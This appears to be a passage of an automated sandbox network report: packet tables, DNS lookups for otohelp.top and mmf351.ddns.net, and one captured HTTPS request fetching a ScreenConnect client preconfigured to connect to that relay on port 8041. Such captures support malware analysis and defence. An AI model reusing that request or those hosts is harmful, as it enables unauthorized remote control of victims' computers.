Oct 2, 2024 06:25:34.330518007 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.330648899 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.330665112 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.330720901 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.341264009 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.341291904 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.341404915 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.341420889 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.341573000 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.341886997 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.341917992 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.341965914 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.341978073 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.342011929 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.342032909 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.342451096 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.342473984 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.342531919 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.342545986 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.342591047 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.342976093 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.342994928 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.343043089 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.343061924 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.343085051 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.343111038 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.345252037 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.414614916 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.414644957 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.414819002 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.414863110 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.414978981 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415213108 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415237904 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415294886 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415314913 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415344954 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415366888 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415786982 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415807962 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415852070 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415865898 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.415893078 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.415913105 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.417947054 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.417970896 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.418026924 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.418040991 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.418067932 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.418087006 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.427992105 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428006887 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428097963 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.428137064 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428302050 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.428750038 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428765059 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428809881 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.428823948 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.428850889 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.428869963 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429156065 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429172993 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429239988 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429239988 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429260969 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429299116 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429733992 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429749966 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429812908 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429832935 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.429857016 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.429883957 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.494365931 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.494410038 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.494538069 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.494580030 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.494606018 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.494628906 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.499175072 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.499221087 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.499262094 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.499279022 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.499301910 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.499326944 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.499366999 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.519313097 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.592711926 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.592799902 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.592884064 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.593122005 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.593149900 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.234067917 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.235483885 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.235579014 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.496848106 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.496874094 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.496891022 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.496958017 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.497021914 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.497056961 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.497087002 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.582865000 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.582904100 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.582998991 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.583061934 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.583111048 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.583844900 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.583863020 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.583926916 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.583944082 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.583985090 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.668900013 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.668926001 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.669054985 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.669097900 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.669154882 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.669708014 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.669724941 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.669904947 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.669919014 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.669971943 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.671153069 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.671169043 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.671228886 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.671245098 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.671291113 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.745675087 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.745701075 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.745814085 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.745901108 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.745956898 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.755686998 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.755706072 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.755783081 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.755817890 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.755870104 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.756504059 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.756521940 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.756586075 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.756593943 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.756639004 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.757304907 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.757323027 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.757388115 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.757395983 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.757447004 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.758141994 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.758158922 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.758218050 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.758227110 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.758270979 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.821691990 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.821716070 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.821768045 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.821814060 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.821834087 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.821861029 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.832056046 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832072973 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832140923 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.832151890 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832199097 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.832530975 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832546949 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832603931 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.832612991 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.832655907 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.842231035 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842247009 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842303991 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.842315912 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842363119 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.842714071 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842730045 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842783928 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.842791080 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.842833996 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.843312025 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.843327999 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.843408108 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.843416929 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.843461037 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.843945026 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.843960047 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.844006062 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.844013929 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.844039917 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.844058037 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.844582081 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.844598055 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.844656944 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.844664097 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.844707012 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.908452034 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.908480883 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.908576012 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.908627033 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.908710003 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.920260906 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920275927 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920474052 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.920511007 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920563936 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.920753002 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920770884 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920838118 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.920846939 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.920892000 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.929234982 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.929249048 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.929337025 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.929374933 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.929435015 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.929861069 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.929877043 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.929949045 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.929975986 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930017948 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.930381060 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930397034 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930447102 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.930459976 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930479050 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.930500984 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.930903912 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930918932 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.930986881 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.931000948 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.931036949 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.931291103 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.931314945 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.931371927 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.931381941 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.931431055 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.995505095 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.995531082 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.995635033 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:35.995680094 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:35.995738983 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.005944967 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.005969048 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.006043911 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.006078005 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.006120920 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.006329060 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.006347895 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.006409883 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.006421089 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.006464005 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.016196012 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016218901 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016284943 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.016305923 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016351938 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.016820908 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016839981 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016902924 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.016911983 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.016954899 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.017349958 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017366886 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017398119 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017425060 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.017436981 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017462969 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.017496109 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.017652035 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017719030 CEST	443	49738	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:36.017772913 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:36.017959118 CEST	49738	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:38.518790007 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:38.524164915 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:38.524235010 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:39.135921001 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:39.141253948 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:39.311599970 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:39.361880064 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:39.362370968 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:39.367139101 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:39.549000978 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:39.596215010 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:41.285535097 CEST	49740	8041	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:41.290503025 CEST	8041	49740	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:41.290668964 CEST	49740	8041	192.168.2.6	79.110.49.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:25:13.943995953 CEST	51321	53	192.168.2.6	1.1.1.1
Oct 2, 2024 06:25:14.940165043 CEST	51321	53	192.168.2.6	1.1.1.1
Oct 2, 2024 06:25:15.767126083 CEST	53	51321	1.1.1.1	192.168.2.6
Oct 2, 2024 06:25:15.767142057 CEST	53	51321	1.1.1.1	192.168.2.6
Oct 2, 2024 06:25:38.478089094 CEST	50716	53	192.168.2.6	1.1.1.1
Oct 2, 2024 06:25:38.486351013 CEST	53	50716	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:25:13.943995953 CEST	192.168.2.6	1.1.1.1	0xf73	Standard query (0)	otohelp.top	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:14.940165043 CEST	192.168.2.6	1.1.1.1	0xf73	Standard query (0)	otohelp.top	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:38.478089094 CEST	192.168.2.6	1.1.1.1	0x1375	Standard query (0)	mmf351.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:25:15.767126083 CEST	1.1.1.1	192.168.2.6	0xf73	No error (0)	otohelp.top		79.110.49.16	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:15.767142057 CEST	1.1.1.1	192.168.2.6	0xf73	No error (0)	otohelp.top		79.110.49.16	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:18.970045090 CEST	1.1.1.1	192.168.2.6	0x879b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:25:18.970045090 CEST	1.1.1.1	192.168.2.6	0x879b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:20.574424982 CEST	1.1.1.1	192.168.2.6	0x36f1	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:25:20.574424982 CEST	1.1.1.1	192.168.2.6	0x36f1	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:25:38.486351013 CEST	1.1.1.1	192.168.2.6	0x1375	No error (0)	mmf351.ddns.net		79.110.49.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

otohelp.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:16 UTC	623	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip Connection: Keep-Alive
